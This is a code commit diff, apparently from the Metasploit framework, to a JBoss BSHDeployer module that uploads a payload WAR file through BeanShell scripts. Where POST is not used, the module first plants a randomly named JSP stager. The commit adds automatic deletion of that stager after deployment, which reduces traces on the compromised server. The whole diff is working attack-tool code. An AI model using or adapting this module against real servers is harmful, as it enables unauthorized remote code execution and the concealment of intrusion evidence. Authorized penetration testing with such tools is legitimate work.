Remove STAGERNAME option

This option wasn't really required, the stager can be removed as
soon as the WAR is deployed. This commit does the modifications needed
to remove the stager right after the WAR deployment.

Author: us3r777

lib/msf/http/jboss/bean_shell.rb

@@ -18,6 +18,7 @@ def deploy_bsh(bsh_script)
     end
 
     packages.each do |p|
+      print_status("Attempting to use '#{p}' as package")
       if deploy_package(bsh_script, p)
         return p
       end
@@ -34,7 +35,6 @@ def deploy_bsh(bsh_script)
   def deploy_package(bsh_script, package)
     success = false
 
-    print_status("Attempting to use '#{package}' as package")
     res = invoke_bsh_script(bsh_script, package)
 
     if res.nil?

modules/auxiliary/admin/http/jboss_bshdeployer.rb

@@ -41,12 +41,11 @@ def initialize
       [
         Opt::RPORT(8080),
         OptString.new('APPBASE',    [ true,  'Application base name', 'payload']),
-        OptString.new('STAGERNAME', [ false, 'Only used if VERB is not POST', 'stager']),
         OptPath.new('WARFILE',      [ false, 'The WAR file to deploy'])
       ], self.class)
   end
 
-  def deploy_action(app_base, stager_name, war_data)
+  def deploy_action(app_base, war_data)
     encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '')
 
     if http_verb == 'POST'
@@ -57,6 +56,7 @@ def deploy_action(app_base, stager_name, war_data)
       }
     else
       print_status("#{peer} - Deploying stager...")
+      stager_name = Rex::Text.rand_text_alpha(8 + rand(8))
       stager_contents = stager_jsp(app_base)
       opts = {
         :dir => "#{stager_name}.war",
@@ -78,7 +78,7 @@ def deploy_action(app_base, stager_name, war_data)
     unless http_verb == 'POST'
       # call the stager to deploy our real payload war
       stager_uri = '/' + stager_name + '/' + stager_name + '.jsp'
-      payload_data = "#{rand_text_alpha(8+rand(8))}=#{Rex::Text.uri_encode(encoded_payload)}"
+      payload_data = "#{Rex::Text.rand_text_alpha(8+rand(8))}=#{Rex::Text.uri_encode(encoded_payload)}"
       print_status("#{peer} - Calling stager #{stager_uri} to deploy final payload...")
       res = deploy('method' => 'POST',
                    'data'   => payload_data,
@@ -88,19 +88,28 @@ def deploy_action(app_base, stager_name, war_data)
       else
         print_error("#{peer} - Failed to deploy final payload")
       end
+
+      # Remove the stager
+      print_status("#{peer} - Removing stager...")
+      files = {}
+      files[:stager_jsp_name] = "#{stager_name}.war/#{stager_name}.jsp"
+      files[:stager_base] = "#{stager_name}.war"
+      delete_script = generate_bsh(:delete, files)
+      res = deploy_package(delete_script, package)
+      if res.nil?
+        print_error("#{peer} - Unable to remove Stager")
+      else
+        print_good("#{peer} - Stager successfully removed")
+      end
     end
 
   end
 
-  def undeploy_action(app_base, stager_name)
+  def undeploy_action(app_base)
     # Undeploy the WAR and the stager if needed
     print_status("#{peer} - Undeploying #{app_base} by deleting the WAR file via BSHDeployer...")
 
     files = {}
-    unless stager_name.nil?
-      files[:stager_jsp_name] = "#{stager_name}.war/#{stager_name}.jsp"
-      files[:stager_base] = "#{stager_name}.war"
-    end
     files[:app_base] = "#{app_base}.war"
     delete_script = generate_bsh(:delete, files)
 
@@ -114,22 +123,16 @@ def undeploy_action(app_base, stager_name)
 
   def run
     app_base = datastore['APPBASE']
-    if http_verb == 'POST'
-      stager_name = nil
-    else
-      stager_name = datastore['STAGERNAME']
-      stager_name = "stager" if stager_name.blank?
-    end
 
     case action.name
     when 'Deploy'
       unless File.exist?(datastore['WARFILE'])
         print_error("WAR file not found")
       end
       war_data = File.read(datastore['WARFILE'])
-      deploy_action(app_base, stager_name, war_data)
+      deploy_action(app_base, war_data)
     when 'Undeploy'
-      undeploy_action(app_base, stager_name)
+      undeploy_action(app_base)
     end
   end
 end